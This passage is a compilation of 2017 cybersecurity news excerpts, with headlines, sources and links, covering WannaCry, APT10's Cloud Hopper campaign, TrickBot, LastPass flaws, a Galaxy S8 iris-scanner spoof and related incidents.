Samsung's eye-scanning security technology, used on the new Galaxy S8 smartphone, has been fooled with a photograph and a contact lens.

The iris-scanner can be used to unlock the phone simply by looking at it, which Samsung says provides "airtight security". But researchers at Chaos Computer Club had easily tricked the device with a picture of an eye, Motherboard said.

Samsung told the BBC it was "aware of the issue".

The researchers first set up the phone's security by registering a volunteer's eyes using the S8 iris scanner.

They then took a photograph of one of the volunteer's eyes, using a digital camera with an infra-red night vision setting.

-----------------------
EU CYBERSECURITY AGENCY SEEKS FUNDS AND POWER TO POLICE ATTACKS
(Euractiv, dated 22nd May 2017 author Catherine Stupp)

Full article [Option 1]:

www.euractiv.com/section/cybersecurity/interview/eu-cybersecurity-agency-seeks-remit-funds-to-police-attacks/

The EU cybersecurity agency ENISA will receive a makeover in September when the European Commission renews its mandate amid a whirlwind of new cybersecurity measures. The director of the Athens-based agency has been requesting a larger budget to deal with the rise in attacks on internet-connected devices.

"It would be good to have seven days a week, 24 hour resources here," ENISA director Udo Helmbrecht said in an interview.

Helmbrecht called the EU response to the WannaCry ransomware hack, which affected thousands of people over a week ago, the first example of collaboration by authorities across the EU. National experts shared information and put out warnings to internet users over the weekend, he said.

-----------------------
MICROSOFT OLD SOFTWARE IS DANGEROUS. IS THERE ARE DUTY TO FIX IT ?
(Fortune, dated 20th May 2017 author Jeff John Roberts)

Full article [Option 1]:

http://fortune.com/2017/05/20/microsoft-ransomware-legal/

A global ransomware epidemic is winding down, but questions over the fallout are just beginning. Who's to blame for the crisis that hijacked hundreds of thousands of computers? And can anyone stop such criminals, whose victims included hospitals and police, from striking again?

These aren't easy questions, but one company, Microsoft, has more explaining to do than most. After all, it was flaws in Windows systems that allowed hackers to carry out the ransomware attacks, which also struck companies and governments. In some cases, like the U.K.'s National Health Service, the frozen computers put lives at risk.

-----------------------
WANNACRY : EVERYTHING YOU STILL NEED TO KNOW
(The Register, dated 20th May 2017 author Iain Thomson)

Full article [Option 1]:

http://www.theregister.co.uk/2017/05/20/wannacry_windows_xp/

It has been a week since the Wannacry ransomware burst onto the world's computers - and security researchers think they have figured out how it all started.

Many assumed the nasty code made its way into organizations via email - either spammed out, or tailored for specific individuals - using infected attachments. Once accidentally opened, Wannacry would be installed, its worm features would kick in, and it would start the spread via SMB file sharing on the internal network.

However, the first iteration of the malware - the one that got into the railways, telcos, universities, the UK's NHS, and so on - required no such interaction. According to research by boffins at Malwarebytes, email attachments weren't used. Instead, the malware's operators searched the public internet for systems running vulnerable SMB services, and infected them using the NSA's leaked EternalBlue and DoublePulsar cyber-weapons. Once on those machines, Wannacry could be installed and move through internal networks of computers, again using EternalBlue and DoublePulsar, scrambling files as it went and demanding ransoms.

-----------------------
CANADIAN TELECOM BELL ADMITS HACKERS STOLE MORE THAN 1.9m ACTIVE EMAIL ADDRESSES
(International Business Times, dated 16th May 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/canadian-telecom-bell-admits-hackers-stole-more-1-9m-active-email-addresses-1621883

Bell, the largest telecommunications firm in Canada, has admitted that anonymous hackers were able to illegally steal approximately 1.9 million active email addresses and approximately 1,700 names and active phone numbers from its computer systems.

In a statement this week, published on 15 May, the firm said: "There is no indication that any financial, password or other sensitive personal information was accessed. This incident is not connected to the recent global "WannaCry" malware attacks.

-----------------------
WANNACRY : SOMETIMES YOU CAN BLAME THE VICTIMS
(Computer World, dated 16th May 2017 author Ira Winkler)

Full article [Option 1]:

http://www.computerworld.com/article/3197048/cybercrime-hacking/wannacry-sometimes-you-can-blame-the-victims.html

The WannaCry ransomware attack has created at least tens of millions of dollars of damage, taken down hospitals, and as of the time of this writing, another round of attacks is considered imminent as people show up to work after the weekend. Of course, the perpetrators of the malware are to blame for all the damage and suffering that has resulted. It's not right to blame the victims of a crime, right?

Well, actually, there are cases when victims have to shoulder a portion of the blame. They may not be criminally liable as accomplices in their own victimhood, but ask any insurance adjuster whether a person or institution has a responsibility to take adequate precautions against actions that are fairly predictable. A bank that leaves bags of cash on the sidewalk overnight instead of in a vault is going to have a hard time getting indemnified if those bags go missing.

I should clarify that in a case such as WannaCry, there are two levels of victims. Take the U.K.'s National Health Service, for example. It was badly victimized, but the real sufferers, who are indeed blameless, are its patients. The NHS itself carries some blame.

-----------------------
PERFECT STORM OF RANSOMWARE
(Computer World, dated 16th May 2017 author Matt Hamblen)

Full article [Option 1]:

http://www.computerworld.com/article/3196119/security/perfect-storm-of-ransomware-and-network-worm-hits-unprotected-computers-globally.html

The cruel reality of a global ransomware attack that crippled computer systems in 150 countries on Friday is this: Attackers took advantage of under-prepared computer users and their organizations.

Enterprises -- including manufacturers, car makers, hospitals and government agencies -- were running older versions of Windows or hadn't patched even the newest Windows versions with a patch that Microsoft released in March.

And, truth be told, some unsuspecting users evidently clicked on email links or, more likely, a suspected compressed Zip file attachment that launched the ransomware known as WannaCry, also known as WannaCrypt or WannaCrypto.

-----------------------
MICROSOFT ISSUES FIRST WINDOWS XP PATCH IN 3 YEARS TO STYMIE "WANNACRYPT"
(Computer World, dated 14th May 2017 author Gregg Keizer)

Full article [Option 1]:

http://www.computerworld.com/article/3196292/windows-pcs/microsoft-issues-first-windows-xp-patch-in-3-years-to-stymie-wannacrypt.html

Microsoft on Friday took the unprecedented step of issuing patches for long-demoted versions of Windows, including Windows XP, to immunize PCs from fast-spreading ransomware that has crippled machines worldwide.

To stymie "WannaCrypt" attacks -- which encrypted files on thousands of PCs used by the U.K.'s National Health Service (NHS), causing chaos in many hospitals -- Microsoft published patches for Windows XP, Windows 8 and Windows Server 2003. All had been retired from support: Windows XP in April 2014, Windows 8 in June 2016, Windows Server in July 2015.

-----------------------
UK, NETHERLANDS EMERGE AS GROWING HOTSPOTS FOR ORGINATING CYBERATTACKS
(IBM - Security Intelligence, dated 11th May 2017 author Douglas Bonderud)

Full article [Option 1]:

https://securityintelligence.com/news/uk-netherlands-emerge-as-growing-hotspots-for-originating-cyberattacks/

Europe is climbing the charts, but it's not in a desirable category for EU member countries. According to a recent NTT Security report, more than half of the world's phishing attacks now originate from the Europe, Middle East and Africa region (EMEA).

The Netherlands is ground zero for this type of attack, having suffered 38 percent of noted phishing attacks, which is second only to the U.S. The U.K. also took second spot behind the U.S. in total number of cyberattacks.

-----------------------
FACEBOOK TO HIRE 3,000 EXTRA PEOPLE TO TACKLE LIVE CRIME AND SUICIDE VIDEOS
(International Business Times, dated 3rd May 2017 author Alistair Charlton)

Full artice [Option 1]:

www.ibtimes.co.uk/facebook-hire-3000-extra-people-tackle-live-crime-suicide-videos-1619836

Facebook is to hire an additional 3,000 people over the next year to review reports of graphic, disturbing and inappropriate videos uploaded to the social network and broadcast using Facebook Live.

Chief executive Mark Zuckerberg made the announcement on his own Facebook page, and explained that the reviewers will improve the social network's ability to provide help to users who need it, and "get better at removing things we don't allow... like hate speech and child exploitation."

The 3,000 people will join a team of 4,500 already employed by Facebook to remove content which breaches the company's guidelines.
-----------------------

(1st June 2017)


IT SECURITY REVIEW - APRIL 2017

-----------------------
TRICKBOT MALWARE NOW TARGETING 20 NEW UK BANKS IN FRESH CYBERCRIME SPREE, IBM WARNS
(International Business Times, dated 28th April 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/trickbot-malware-now-targeting-20-new-uk-banks-fresh-cybercrime-spree-ibm-warns-1619186

Security researchers from IBM Security have warned that a strain of banking Trojan, dubbed TrickBot, is escalating attacks against UK banks and financial institutions. The operators of the malware have launched five campaigns this month alone, it has been revealed.

In its current configuration, the financial Trojan is targeting a slew of private banks, wealth management firms, investment companies and insurance businesses, claimed Limor Kessem, one of the top cyber-intelligence experts at IBM's X-Force, in a blog post this week (27 April).

One of the UK targets, although left unnamed, is reportedly one of the "oldest banks in the world."

"The operators have been doing a lot of homework," Kessem continued. "TrickBot has added 20 new private banking brands to its regular attack roster, as well as eight building societies," she added.

Other recently added targets included two Swiss banks and four investment firms in the US.


-----------------------
SEVEN IN TEN UK UNIVERSITIES ADMIT BEING DUPED BY PHISHING ATTACKS
(The Register, dated 27th April 2017 author John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/04/27/uk_uni_phishing_foi/

Seven in ten UK universities have admitted falling victim to a phishing attack in which an individual has been tricked into disclosing personal details via an email purporting to be from a trusted source.

The figure comes from a Freedom of Information (FoI) request by Duo Security to 70 universities across the UK, of which 51 responded. Seven universities, including those with GCHQ-certified degree courses - Oxford and Cranfield University - reported they had been targeted more than 50 times in the 12 months prior to November 2016.

The findings, released Wednesday, follow a recent warning from Action Fraud, the UK's fraud and cybercrime reporting centre, about a phishing scam specifically targeting UK university staff. The bogus email claims the recipient is due for a pay increase, before directing them to click on a link and enter financial details and university logins.

-----------------------
WHY DID TURKISH HACKERS TAKE DOWN A UK PRIMARY SCHOOL WEBSITE ?
(International Business Times, dated 24th April 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/why-did-turkish-hackers-take-down-uk-primary-school-website-1618317

An investigation has been launched by police in Sussex, UK, after a rogue group of alleged Turkish hackers targeted the website of a local primary school. Law enforcement said it may offer reassurance patrols after the "malicious" incident left parents concerned.

The website of North Mundham Primary in Chichester was defaced to show a white background with a red badge-shaped logo often associated with a group called "Ayyildiz Tim".

t displayed a message, which contained an English translation, included the statement: "Hello admin system hacked."

An explainer at the bottom of the website consisted of a lengthy statement by those purporting to be Ayyildiz Tim about using cyberattacks as a "lobbying" force.

-----------------------
RUSSIA HACKED DANISH DEFENCE MINISTRY EMAILS FOR 2 YEARS
(International Business Times, dated 24th April 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/russia-hacked-danish-defence-ministry-emails-2-years-1618378

Denmark's defence minister, Claus Hjort Frederiksen, has directly accused the Russian government of launching "aggressive" cyberattacks against his country after an intelligence report claimed that Kremlin-linked hackers had, for two years, targeted government email accounts.

"What's happening is very controlled. It's not small hacker groups doing it for the fun of it," Frederiksen told Berlingske newspaper. "It's connected to intelligence agencies or central elements in the Russian government, and holding them off is a constant struggle," he added.

Speaking to Danish news agency Ritzau, he added: "This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia."

On 23 April (Sunday), the Centre for Cyber Security (CFCS), a fork of the Danish Defence Intelligence Service (DDIS), claimed pro-Kremlin hacking teams infiltrated the emails of defence ministry personnel for an undisclosed period of time between 2015 and 2016.

-----------------------
INTERPOL-LED OPERATION FINDS NEARLY 9,000 INFECTED SERVERS IN SOUTHEAST ASIA
(Reuters, dated 24th April 2017)

Full article [Option 1]:

http://uk.reuters.com/article/us-singapore-interpol-cyber-idUKKBN17Q1BT

An anti-cybercrime operation by Interpol and investigators from seven southeast Asian nations revealed nearly 9,000 malware-laden servers and hundreds of compromised websites in the ASEAN region, Interpol said on Monday.

Various types of malware, such as that targeting financial institutions, spreading ransomware, launching Distributed Denial of Service (DDoS) attacks and distributing spam were among the threats posed by the infected servers, the operation showed.

"This operation helped participants identify and address various types of cybercrime which had not previously been tackled in their countries," said Francis Chan, head of the Hong Kong Police Force's cybercrime unit and chairman of Interpol's Eurasian cybercrime working group.

-----------------------
GERMAN CYBER CRIME REPORTEDLY ROSE 80% IN 2016
(Daily Mail, dated 23rd April 2017 author Reuters)

Full article [Option 1]:

www.dailymail.co.uk/wires/reuters/article-4438246/German-cyber-crime-rose-80-pct-2016-report.html

The German government registered 82,649 cases of computer fraud, espionage and other cyber crimes in 2016, an increase of just over 80 percent from 2015, a German newspaper reported on Sunday.

German Interior Minister Thomas de Maiziere is due to release the new statistics, part of the government's annual crime report, on Monday, according to Die Welt newspaper.

In addition to cyber crime, German police also registered 253,290 cases of crimes carried out with the help of the internet, an increase of 3.6 percent from 2015, the newspaper reported.

-----------------------
THOUSANDS EXPOSED TO HACKERS BY WIFI ROUTERS
(The Independent, dated 20th April 2017 author Aatif Sulleyman)

Full article [Option 1]:

www.independent.co.uk/life-style/gadgets-and-tech/news/wifi-hackers-risk-linksys-routers-exposed-a7691496.html

Security researchers have discovered a range of vulnerabilities affecting a range of Wi-Fi routers.

Both "high-risk" and "low-risk" issues have been uncovered in more than 20 different Linksys router models, over 7,000 of which were "exposed on the internet" when the research was conducted in the fourth quarter of 2016.

The vulnerabilities could allow cybercriminals to leak information about devices connected to the router, as well as overload the router itself and deny access to a user.

-----------------------
IT ADMINISTRATOR SET "TIME BOMB" MALWARE TO TORPEDO EX-ENPLOYERS YEAR END AUDIT
(International Business Times, dated 18th April 2017 author Mary-Ann Russon)

Full article [Option 1]:

www.ibtimes.co.uk/it-administrator-set-time-bomb-malware-torpedo-ex-employers-year-end-audit-1617499

There's a reason companies should fear disgruntled employees - they can really harm your business. An IT systems administrator is being sued by his former employer for allegedly installing malware that automatically deleted critical financial data after he left.

Semiconductor manufacturer Allegro Microsystems has filed a lawsuit against Nimesh Patel, who worked for the company for 14 years from August 2002 to January 2016. The lawsuit (first spotted by Bleeping Computer) alleges that Patel was given three laptops to use during his time at the company.

Patel resigned from his position, and when he left the company on 8 January 2016, he returned the two business laptops, However he kept the third laptop, which had been designated for personal use, with the company's blessings.

However, Allegro alleges that on 31 January 2016, Patel returned to the grounds of the Allegro headquarters in Worchester, Massachusetts with the third laptop and used it to access the company's Wi-Fi network.

-----------------------
RUSSIAN BUILT MALWARE CAN GIVE HACKER FULL REMOTE ACCESS TO ANDROID SMARTPHONE
(International Business Times, dated 11th April 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/russian-built-malware-can-give-hackers-full-remote-access-your-android-smartphone-1616583

Providing a glimpse into a Russian-built malware campaign, a team of security researchers has analysed an Android-based adware family, discovering it's more dangerous than previously known. It could potentially give hackers "full remote access" on an infected device.

The cybercriminals behind "multiple" new strains of an advertising malware (adware) codenamed "Ewind" take a simple but effective approach to infecting unwitting users: downloading legitimate applications, tearing them apart and repackaging them with malicious code.

-----------------------
GERMANY ROLLS OUT NEW CYBER DEFENCE TEAM
(Euractiv, dated 6th April 2017 author Andreas Maisch)

Full article [Option 1]:

www.euractiv.com/section/cybersecurity/news/germany-rolls-out-new-cyber-defence-team/

Germany's army was targeted 284,000 times by cyber attacks in the first three months of 2017. Yesterday (5 April), the Bundesrepublik's new cyber defence unit was officially put into action. But its offensive capabilities are already under scrutiny. EURACTIV Germany reports.

The new commando unit is set to be 13,500 personnel strong by July. By comparison, its marines corps has around 16,000 soldiers and the air force 28,000.

Germany hopes to be a model for other European armed forces to follow in dealing with cyber attacks.

German lawmakers said that the new unit will focus on combatting Russian hacking. It will be led by Ludwig Leinhos, a seasoned veteran of the armed forces and the country's highest-ranking cyber-general.

-----------------------
GCHQ BOSS : "WE GET CRAZY THEORIES THROWN AT US EVERY DAY"
(BBC News, dated 5th April 2017 author Gordon Corera)

Full article : www.bbc.co.uk/news/uk-39508851

The operations centre sits on one of the upper floors of GCHQ and runs 24/7. At any one time, a team of analysts might be monitoring the kidnap of a British citizen abroad or an ongoing counter-terrorist operation run jointly with MI5.

In one corner, a large globe visualises all the cyber attacks targeting the UK from around the world. The room is a reminder of the range of activity that GCHQ is involved in - as well as its global reach in monitoring communications and data flows.

Russian cyber attacks are high up the agenda, in the wake of claims Moscow interfered in the US election and is trying the same in Europe.

"The scale has changed. They've invested a lot of money and people in offensive cyber behaviour and critically they've decided to do reckless and interfering things in European countries."

Mr Hannigan says that whilst it is impossible to be absolutely sure, the defences against such attacks seem to have held in the UK.

-----------------------
UK AND SWEDISH WATCHDOGS WARN OF INTERNATIONAL CYBER ATTACK
(Reuters, dated 5th April 2017)

Full article [Option 1]: www.reuters.com/article/us-sweden-cyber-idUSKBN17714Y

A large-scale cyber attack from a group targeting organizations in Japan, the United States, Sweden and many other European countries through IT services providers has been uncovered, the Swedish computer security watchdog said on Wednesday.

The cyber attack, uncovered through a collaboration by Britain's National Cyber Security Centre, PwC and cyber security firm BAE Systems, targeted managed service providers to gain access to their customers' internal networks since at least May 2016 and potentially as early as 2014.

The exact scale of the attack, named Cloud Hopper from an organization called APT10, is not known but is believed to involve huge amounts of data, Sweden's Civil Contingencies Agency said in a statement. The agency did not say whether the cyber attacks were still happening.

-----------------------
FRANCE HAS A "FORTH ARMY" OF YOUNG HACKERS FOR CYBER WARFARE
(Business Insider, dated 5th April 2017 author Marine Pennetier, Reuters)

Full article [Option 1]:

http://uk.businessinsider.com/france-is-grooming-a-fourth-army-of-young-hackers-for-cyber-warfare-2017-4

Huddled around their computers, two dozen French 20-somethings have been typing away feverishly for seven hours. Their objective is clear. Eliminate a virus crippling the systems of a government environmental agency.

"Mission accomplished! They have done what they were asked to do. Analyze, identify and then develop a code that wipes it out," says Patrice, a French military officer testing potential recruits at a cyber defense center in western France.

The exercise was one of dozens held across the country between March 20 and 31, involving 240 people from 12 elite technology colleges, part of a plan to create an army of talented cyber spies to counter digital destabilization efforts.
-----------------------
GERMAN MILITARY HIT WITH NEARLY 300,000 CYBERATTACKS SO FAR IN 2017
(International Business Times, dated 3rd April 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/german-military-hit-nearly-300000-cyberattacks-so-far-2017-cyber-chief-warns-1615085

The head of the German military's new cyber command, Lieutenant General Ludwig Leinhos, has revealed that army computers were targeted hundreds of thousands of times in the first nine weeks of 2017, amid rising fears that Russia-linked hackers are stepping up their activity.

"From hacker attacks to state attacks, we must be prepared for everything," Leinhos told German publication Bild on 2 April (Sunday). "In the first nine weeks of this year alone, Bundeswehr [armed forces] computers were attacked more than 284,000 times."

He did not specify what types of cyberattacks hit the sensitive computer networks, but the military later indicated no classified material was compromised.

-----------------------
SERIOUS HACK ATTACKS FROM CHINA TARGETING UK FIRMS
(BBC News, dated 3rd April 2017)

Full article : www.bbc.co.uk/news/technology-39478975

UK firms have been warned about "serious" cyber attacks originating in China that seek to steal trade secrets.

The gang behind the attacks has compromised technology service firms and plans to use them as a proxy for attacks, security firms have said.

The group, dubbed APT10, is using custom-made malware and spear phishing to gain access to target companies.

The National Cyber Security Centre and cyber units at PwC and BAE Systems collaborated to identify the group.

"Operating alone, none of us would have joined the dots to uncover this new campaign of indirect attacks," said Richard Horne, cyber security partner at PwC.

-----------------------
OPERATION CLOUD HOPPER
(PwC, dated April 2017)

Full article [Option 1]:

https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html

PwC's cyber security practice has worked closely with BAE Systems and other members of the security community, along with the UK's National Cyber Security Centre (NCSC), to uncover and disrupt what is thought to be one of the largest ever sustained global cyber espionage campaigns in an operation referred to as 'Operation Cloud Hopper'.

Since late 2016, PwC and BAE Systems have been collaborating to research the threat, brief the global security community and assist known victims. The threat actor behind the campaign is widely known within the security community as 'APT10', referred to within PwC UK as 'Red Apollo'.

The espionage campaign has targeted managed IT service providers (MSPs), allowing the APT10 group unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally. This indirect approach of reaching many through only a few targets demonstrates a new level of maturity in cyber espionage - so it's more important than ever to have a comprehensive view of all the threats your organisation might be exposed to, either directly or through your supply chain.

-----------------------
FINNISH SECRET SERVICE WARNS THAT RUSSIAN HACKERS AND SPIES COULD BE POSING AS YOUR BEST FRIEND
(International Business Times, dated 31st March 2017 author Mary-Ann Russon)

Full article [Option 1]:

www.ibtimes.co.uk/finnish-secret-service-warns-that-russian-hackers-spies-could-be-posing-your-best-friend-1614748

Finland's secret police claim that foreign espionage is on the rise, to the extent that Russian nation state hackers are working together with spies to befriend unsuspecting Finns so they can extract sensitive information and trade secrets about Finnish government agencies and companies from them.

The Finnish Security Intelligence Service (known as Supo) has released a report reviewing its efforts to protect national security in 2016. One key section in the report relates to an increase in foreign state actors who have been detected trying to hack into Finnish computer networks to gain access to sensitive data.

In particular, Supo has highlighted cyber-intrusions made by APT28, a notorious Russian hacking group also dubbed Fancy Bear, which is hacking into Finnish networks frequently and without even bothering to hide its tracks. Multiple cybersecurity firms believe that this group is linked to the Kremlin's intelligence services, following comprehensive analysis of the hackers' techniques and choice of malware.

-----------------------

(1st June 2017)


IT SECURITY REVIEW - MARCH 2017

-----------------------
HACKERS ATTEMPTED TO ATTACK GERMAN PARLIAMENT IN JANUARY
(International Business Times, dated 30th March 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hackers-attempted-attack-german-parliament-january-via-compromised-israeli-news-site-1614389

Hackers reportedly targeted the German parliament with new cyberattacks as recently as January. The malvertising campaign saw hackers use a compromised Israeli news site to redirect users to a malicious site. However, cyber defences incorporated after the parliament was hacked in 2015 reportedly helped officials thwart the cyberattack, according to the German cybersecurity watchdog.

According to the Federal Office for Information Security (BSI), unusual activity on the parliament's network was investigated earlier in the year. The hackers allegedly manipulated the website of the Jerusalem Post, redirecting those clicking on advertising run on the site to a malicious website, Reuters reported.

-----------------------
RANSOMWARE FOUND IN DUTCH PARLIAMENT
(NL Times, dated 28th March 2017 author Janene Pieters)

Full article [Option 1]:

http://nltimes.nl/2017/03/28/ransomware-found-dutch-parliament

Ransomware was found on the computer systems of the Tweede Kamer, the lower house of Dutch parliament, a spokesperson for the Kamer confirmed to various news sources after D66 parliamentarian Kees Verhoeven posted about it on Twitter. Exactly what happened is unclear, but according to Tweakers, the problems are largely solved.

"The Kamer already took appropriate measures. As usual, we can not discuss it further because of safety", the Kamer spokesperson said to NOS.

An internal Tweede Kamer email, which broadcaster NOS got its hands on, shows that the ransomware did manage to encrypt some files. "We are dealing with ransomware which addressed significant attacks on us (and according to Fox-IT some companies) and which unfortunately encrypted files", the email reads, according to NOS. "The mail is now blocked. Currently we are analyzing the damage. Then we will repair the damage. We will do this by replacing the infected files with a backup."

-----------------------
MILIONS OF ACCOUNTS FROM 25 HACKED vBULLETIN FORUMS BEING "SOLD" ON THE DARK WEB
(International Business Times, dated 27th March 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/millions-accounts-25-hacked-vbulletin-forums-being-sold-dark-web-1613849

The dark web has allegedly been flooded with millions of accounts from recently compromised vBulletin forums. A hacker, going by the pseudonym "Cfnt", has reportedly claimed to have hacked 25 web forums, which were running on outdated versions of the vBulletin software.

The alleged hacked forums belong to various categories, including fitness, technology, network security, gaming, animations and entertainment. Among those compromised are forums such as Subagames.com, rappers.in, forums.spybot.info, cashcrate.com, codingforums.com, dcemu.co.uk, asia-team.net, dbforums.com and forums.3dtotal.com, HackRead reported.

-----------------------
CRITICAL SECURITY FLAW TURN ALL ANTIVIRUS SOFTWARE AGAINST YOU
(International Business Times, dated 24th March 2017)

Full article [Option 1]:

www.ibtimes.co.uk/double-agent-critical-zero-day-security-flaw-turns-all-antivirus-software-against-you-1613526

Cybersecurity researchers have discovered a zero-day vulnerability that would enable attackers to gain access to many major antivirus software brands on the market today and use the software to hijack a user's computer.

Researchers from Israel-based cybersecurity firm Cybellum have found that a 15-year-old legitimate feature of Windows called Microsoft Application Verifier that exists in every single version of the operating system can be exploited to enable hackers to inject malicious code into computers.

nstead of trying to hide from antivirus software, the technique enables attackers to seize control of the antivirus and install malware that hijacks the user's machine to do pretty much anything the hacker wants, from installing backdoors to sending data out to the hacker's server or stealing and encrypting user data.

The flaw affects all major antivirus products like Avast, AVG, Avira, Bitdefender, Comodo, ESET, F-Secure, Kaspersky, Malwarebytes, McAfee, Norton, Panda, Quick Heal and Trend Micro, as well as many other small brands.

Malwarebytes, AVG, Trend Micro, Kaspersky Lab, ESET and Avast have all issued statements that they have patched the bug, while Comodo and Symantec claim that their products were either not vulnerable or provide protections able to negate such an attack.

In the case of Norton, owned by Symantec, this is particularly interesting, seeing as the researchers claim their proof of concept demonstration was able to take over the latest version of Norton Antivirus.

-----------------------
GOOGLE AND SYMANTEC CLASH ON WEBSITE SECURITY CHECKS
(BBC News, dated 24th March 2017)

Full article : www.bbc.co.uk/news/technology-39365315

Search giant Google and security firm Symantec have clashed over the way websites are kept secure.

Google claims Symantec has done a poor job of using standard tools, called certificates, that check the identity of thousands of websites.

It will change its Chrome browser to stop recognising some Symantec certificates, causing problems for people who visit sites using them.

Symantec said Google's claims were "exaggerated" and "irresponsible".

The row concerns identity checks known as "security certificates", which underlie the HTTPS system that ensures data is encrypted as it travels to and from a website.

Symantec is one of the biggest issuers of basic security certificates as well as their extended versions, which are supposed to give users more confidence in the security of a site.

-----------------------
APPLE SAYS ITS SYSTEMS HAVE NOT BEEN BREACHED AS HACKERS THREATEN TO WIPE DATA FROM MILLIONS OF iPHONES
(Iternational Business Times, dated 23rd March 2017 author Hyacinth Mascarenhas)

Full article [Option 1]:

www.ibtimes.co.uk/apple-says-its-systems-have-not-been-breached-hackers-threaten-wipe-data-millions-iphones-1613276

Apple has responded to claims that a hacker group has gained access to hundreds of millions of iCloud and other Apple email accounts stating that none of its systems were breached. Hackers going by the name 'Turkish Crime Family' claimed earlier in the week that they had gained access to more than 300 million Apple email accounts including iCloud and @me domains.

Motherboard first reported that the group demanded a $75,000 (£59,932) ransom in Bitcoin or Ethereum and threatened to remotely wipe millions of iCloud accounts if Apple did not pay up by 7 April. They said they were willing to accept $100,000 worth of iTunes gift cards as payment.

-----------------------
PASSWORD-STEALING FLAWS IN LASTPASS CHROME AND FIREFOX EXTENSIONS
(Computer World, dated 22nd March 2017 author Darlene Storm)

Full article [Option 1]:

www.computerworld.com/article/3183586/security/password-stealing-flaws-in-lastpass-chrome-and-firefox-extensions.html

Tavis Ormandy, a security researcher on Google's Project Zero team, warned of flaws in LastPass browser extensions, vulnerabilities which - if a person surfed to a malicious site - would allow the malicious site to steal passwords from the password manager.

LastPass said it patched the vulnerability in its Chrome extension and said it is working on a fix for the flaw in its Firefox add-on.

Ormandy originally said the LastPass bug affected 4.1.42 Chrome and Firefox browser extensions. He developed a working exploit for a Windows box running the LastPass Chrome extension, but said it "could be made to work on other platforms.

********UPDATE 1********

LASTPASS FIXES SERIOUS PASSWORD LEAK FLAWS
(Computer World, dated 22nd March 2017 author Lucian Constantin)

Full article [Option 1]:

http://www.computerworld.com/article/3183602/security/lastpass-fixes-serious-password-leak-flaws.html

Developers of the popular LastPass password manager rushed to push out a fix to solve a serious vulnerability that could have allowed attackers to steal users' passwords or execute malicious code on their computers.

*********UPADATE 2**********

LASTPASS IS SCRAMBLING TO FIX ANOTHER SERIOUS VULNERABILITY
(Computer World, dated 28th March 2017 author Lucian Constantin)

Full article [Option 1]:

www.computerworld.com/article/3185463/security/lastpass-is-scrambling-to-fix-another-serious-vulnerability.html

For the second time in two weeks, developers of the popular LastPass password manager are working to fix a serious vulnerability that could allow malicious websites to steal user passwords or infect computers with malware.

-----------------------
CISCO ISSUES CRITICAL WARNING AFTER CIA WIKILEAKS DUMP BARES IOS (Internet Operating System) SECURITY WEAKNESS
(Computer World, dated 21st March 2017 author Michael Cooney)

Full article [Option 1]:

www.computerworld.com/article/3183143/security/cisco-issues-critical-warning-after-cia-wikileaks-dump-bares-ios-security-weakness.html

A vulnerability in Cisco's widely deployed IOS software that was disclosed in the recent WikiLeaks dump of CIA exploits has triggered the company to release a critical warning for its Catalyst networking customers.

A vulnerability in Cisco's widely deployed IOS software that was disclosed in the recent WikiLeaks dump of CIA exploits has triggered the company to release a critical warning for its Catalyst networking customers. The vulnerability -- which could let an attacker cause a reload of an affected device or remotely execute code and take over a device -- affects more than 300 models of Cisco Catalyst switches from the model 2350-48TD-S Switch to the Cisco SM-X Layer 2/3 EtherSwitch Service Module.

(UAWARE COMMENT : Well so what. I haven't got a Cisco Switch; and you probably haven't got one either! Cisco equipement is probably the most used in the networking industry. It is used to switching data and other communications around ISP and telephone networks around the world, let alone Global companies private networks. So if cybercriminals have some form of free access, then that is real trouble.)

-----------------------
MICROSOFT FIXES RECORD NUMBER OF FLAWS
(Computer World, dated 15th March 2017 author Lucian Constantin)

Full article [Option 1]:

www.computerworld.com/article/3181314/security/microsoft-fixes-record-number-of-flaws-some-publicly-known.html

Microsoft's batch of security patches for March is one of the largest ever and includes fixes for several vulnerabilities that are publicly known and actively exploited.

The company published 17 security bulletins covering 135 vulnerabilities in its own products and one separate bulletin for Flash Player, which has its security patches distributed through Windows Update. Nine bulletins are rated critical and nine are rated as important.

The affected products include Windows, Internet Explorer, Microsoft Edge, Microsoft Office, Exchange, Skype for Business, Microsoft Lync, and Silverlight.

-----------------------
ANDROID DEVICES COMING WITH PREINSTALLED MALWARE
(Computer World, dated 13th March 2017 author Darlene Storm)

Full article [Option 1]:

www.computerworld.com/article/3179841/android/android-devices-coming-with-preinstalled-malware.html

The phone, given to you by your company, could be targeted at some point and end up with a malware infection, but you wouldn't expect the malware to be preinstalled "somewhere along the supply chain." Yet preinstalled malware is precisely what one security vendor found on 38 Android devices.

Check Point Software Technologies did not name the affected companies, saying only that the phones belonged to "a large telecommunications company" and "a multination technology company." A good chunk of the infected phones were Samsung models, but phones by Lenovo, LG, Asus, ZTE, Vivo, Oppo and Xiaomi were also preinstalled with malware after leaving the manufacturers but before landing in the hands of the companies' employees.

-----------------------
DARK WEB REPORTEDLY SHRUNK BY 85% AFTER ANONYMOUS FREEDOM HOSTING II HACK
(International Business Times, dated 9th March 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/anonymous-freedom-hosting-ii-hack-reportedly-shrunk-dark-web-by-85-1610611

Dark web services have reportedly gone down recently. A massive cyberattack on Freedom Hosting II, a web hosting service that handled nearly 20% of all the dark web sites, mounted by the notorious Anonymous hacker group, is likely responsible for significantly shrinking the dark web.

According to a recent OnionScan report, only 4,400 dark web services currently remain active, a significant drop from the nearly 30,000 services that existed in 2016. This means that around 85% of the dark web was impacted following the cyberattack. Independent security researcher Sarah Jamie Lewis said the Anonymous Freedom Hosting II hack "not only removed many thousands of active sites but also may have affected other hosting providers who were hosting some infrastructure on top of Freedom Hosting II."

-----------------------
JAPAN BECOMING PRIME TARGET FOR RANSOMWARE
(Kyodonews, dated 7th March 2017 author Ichiro Kitamoto)

